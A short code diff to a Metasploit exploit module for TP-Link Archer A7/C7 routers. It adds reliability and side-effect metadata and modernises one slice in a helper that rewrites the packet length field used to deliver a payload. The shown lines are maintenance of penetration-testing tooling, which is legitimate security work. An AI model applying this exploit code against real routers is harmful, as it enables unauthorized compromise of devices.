@@ -62,7 +62,12 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'TP-Link Archer A7/C7 (AC1750) v5 (firmware up to 201029/30)', {} ]
         ],
         'DisclosureDate' => '2020-03-25',
-        'DefaultTarget' => 0
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]
+        }
       )
     )
     register_options(
@@ -298,7 +303,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def update_len_field(packet, payload_length)
     new_packet = packet[0..3]
     new_packet += [payload_length].pack('S>')
-    new_packet += packet[6..-1]
+    new_packet += packet[6..]
     new_packet
   end
 
